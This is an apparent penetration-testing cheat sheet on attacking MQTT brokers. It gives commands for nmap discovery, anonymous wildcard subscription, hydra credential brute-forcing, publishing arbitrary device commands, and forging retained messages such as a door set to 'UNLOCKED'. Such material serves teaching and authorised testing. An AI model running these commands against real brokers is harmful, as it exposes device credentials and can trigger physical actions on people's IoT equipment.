MQTT (Message Queuing Telemetry Transport) - Port 1883

Become VeryLazyTech member! 🎁
Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

Basic info

MQTT (Message Queuing Telemetry Transport) is a lightweight messaging protocol for IoT devices, using a publish-subscribe model over TCP/IP. The most popular open-source broker implementation is Mosquitto. Due to minimal configuration and often insecure deployments, MQTT services are frequently vulnerable to attack.

Key characteristics:

Default port: TCP 1883 (unencrypted), 8883 (TLS)
Stateless pub/sub model
Authentication optional
Wildcard topics and retained messages

Discovering MQTT Services via Network Scanning

Nmap Detection of MQTT Brokers

Scan for MQTT using service and version detection:

nmap -sV -p 1883,8883 --script mqtt-subscribe <target-ip>

Useful Nmap NSE scripts:

mqtt-subscribe.nse — connects and subscribes to common topics
mqtt-connect.nse — attempts anonymous authentication

Manual Enumeration with Netcat or Telnet

telnet <target-ip> 1883

A successful connection banner or acknowledgment byte from the broker confirms its presence.

Assessing Authentication and Authorization Mechanisms

Many MQTT brokers allow anonymous access by default. Check this using mosquitto_sub:

mosquitto_sub -h <target-ip> -t '#' -v

If the broker allows wildcard topic subscription without credentials, it is misconfigured and vulnerable.

Try authentication bypass:

mosquitto_sub -h <target-ip> -t '#' -v -u test -P test

Read All Topics with Wildcards

mosquitto_sub -h <target-ip> -t '#' -v

This reveals:

Sensor values
Credentials sent by devices
Internal control commands
Presence of retained messages

Publishing Arbitrary Payloads

mosquitto_pub -h <target-ip> -t 'iot/device/command' -m 'REBOOT'

This could trigger real-world actions on connected devices if the topic is subscribed.

Brute Forcing MQTT Credentials

Use hydra for credential brute-force:

hydra -L users.txt -P passwords.txt mqtt://<target-ip>:1883 -V

Persistent Attacks with Retained Messages

Retained messages persist even after the publisher disconnects, making them ideal for:

Persistence payloads
Credential harvesting
Fake sensor data injection

Set retained payload:

mosquitto_pub -h <target-ip> -t 'iot/door/status' -m 'UNLOCKED' -r

When a new subscriber connects, it immediately receives the forged message.

Learn & practice For the Bug Bounty

Support VeryLazyTech 🎉

Become VeryLazyTech member! 🎁

Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

PreviousPPTP - Port 1723 NextCompaq HP Insight Manager - Port 2301, 2381

Last updated 6 months ago

Was this helpful?